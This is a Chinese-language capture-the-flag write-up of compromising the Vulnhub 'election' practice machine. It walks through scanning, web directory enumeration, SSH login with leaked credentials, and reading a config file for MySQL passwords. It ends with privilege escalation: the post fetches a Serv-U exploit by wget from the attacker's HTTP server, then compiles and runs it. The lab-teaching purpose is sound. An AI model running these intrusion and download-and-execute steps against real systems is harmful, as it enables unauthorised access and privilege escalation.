渗透Vulnhub-election靶机日志信息泄露

admin 2025年2月10日11:49:02评论5 views字数 2674阅读8分54秒阅读模式

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列election靶机有一定的了解

一、信息收集阶段

靶机下载地址:https://www.vulnhub.com/entry/election-1,503/
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.220.0/24

1、扫描网段,发现主机

nmap -sP 192.168.220.0/24 
渗透Vulnhub-election靶机日志信息泄露

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.220.129
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
渗透Vulnhub-election靶机日志信息泄露

二、攻击阶段

1、web目录枚举

dirb http://192.168.220.129
# http://192.168.220.129/phpmyadmin/
# http://192.168.220.129/robots.txt
# http://192.168.220.129/phpinfo.php
渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露

2、wappalyzer插件

渗透Vulnhub-election靶机日志信息泄露

3、访问robots.txt文件内的目录

渗透Vulnhub-election靶机日志信息泄露
http://192.168.220.129/admin
http://192.168.220.129/wordpress
http://192.168.220.129/user
http://192.168.220.129/election
渗透Vulnhub-election靶机日志信息泄露

4、web枚举election目录

dirb http://192.168.220.129/election/
![](https://files.mdnice.com/user/82436/f22ad6b0-7255-4d32-b1b2-cedfcd3f1577.png)

渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露

5、使用泄露用户名密码ssh链接靶机

ssh [email protected]
# username:love
# passwd:P@$$w0rd@123
渗透Vulnhub-election靶机日志信息泄露

三、提权阶段

1、查看版本内核

uname -a
lsb_release -a
渗透Vulnhub-election靶机日志信息泄露

2、sudo -l 以及suid文件

sudo -l 
find / -perm -4000 -print 2>/dev/null  #查找SUID 权限的文件
渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露

3、查看端口进程信息

netstat -tuln
渗透Vulnhub-election靶机日志信息泄露
ps -aux |grep mysql
渗透Vulnhub-election靶机日志信息泄露

4、网站配置文件信息查找mysql账号信息

cd /var/www/html/election/admin/inc
cat conn.php 

# 得到账号密码信息:newuser    password
渗透Vulnhub-election靶机日志信息泄露

5、登录mysql

# 账号密码信息:newuser    password
mysql -u newuser -p
渗透Vulnhub-election靶机日志信息泄露

6、查询mysql信息

show databases;
USE election
select * from tb_pengaturan;
select * from tb_level;
select * from tb_kandidat;
select * from tb_panitia;
渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露

7、查看Serv-U的程序信息

渗透Vulnhub-election靶机日志信息泄露
cd /usr/loacl/Serv-U/Serv-U   #我们在第二步查看suid文件查看到这个目录是一个ftp程序
cat Serv-U-StartupLog.txt 

# 日志信息
[01] Thu 06Feb25 22:50:36 - Serv-U File Server (64-bit) - Version 15.1 (15.1.6.25) - (C) 2017 SolarWinds Worldwide, LLC.  All rights reserved.
[01] Thu 06Feb25 22:50:36 - Build Date: Wednesday, November, 29, 2017 11:28 AM
[01] Thu 06Feb25 22:50:36 - Operating System: Linux 64-bit; Version: 5.3.0-46-generic
[01] Thu 06Feb25 22:50:36 - Loaded graphics library.
[01] Thu 06Feb25 22:50:36 - Unable to load ODBC database libraries.  Install package "unixODBC" to use a database within Serv-U.
[01] Thu 06Feb25 22:50:36 - Loaded SSL/TLS libraries.
[01] Thu 06Feb25 22:50:36 - Loaded SQLite library.
[01] Thu 06Feb25 22:50:36 - FIPS 140-2 mode is OFF.
[01] Thu 06Feb25 22:50:36 - LICENSE: Running beyond trial period.  Serv-U will no longer accept connections.
[01] Thu 06Feb25 22:50:36 - Socket subsystem initialized.
[01] Thu 06Feb25 22:50:36 - HTTP server listening on port number 43958, IP 127.0.0.1
[01] Thu 06Feb25 22:50:36 - HTTP server listening on port number 43958, IP ::1
渗透Vulnhub-election靶机日志信息泄露

8、搜索 Serv-U历史漏洞

searchsploit Serv-U 15.1
渗透Vulnhub-election靶机日志信息泄露

9、下载Serv-U exp文件

searchsploit -m 47009.c
渗透Vulnhub-election靶机日志信息泄露

10、python开启http微服务

# kali开启http微服务,提供给靶机love账号进行下载
python -m http.server
渗透Vulnhub-election靶机日志信息泄露

11、靶机下载exp并编译执行

ls -la /   #确认哪个目录有执行权限
cd /tmp  
wget http://192.168.220.128:8000/47009.c   #下载exp
gcc 47009.c -o pe &&./pe   #编译并执行
渗透Vulnhub-election靶机日志信息泄露
渗透Vulnhub-election靶机日志信息泄露

四、总结

本靶机主要是网页上的日志信息泄露,从而获取服务器普通用户权限,再根据机器上的应用程序版本的信息搜集,使用漏洞检索工具searchsploit,利用exp进行提权。(文中遇到的mysql跟/home/love/desktop/user.txt、 gnome-initial-setup-done  信息或程序大概率都是属于兔子洞骗你在这里花时间)

原文始发于微信公众号(泷羽SEC-ohh):渗透Vulnhub-election靶机日志信息泄露

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月10日11:49:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透Vulnhub-election靶机日志信息泄露https://cn-sec.com/archives/3721741.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息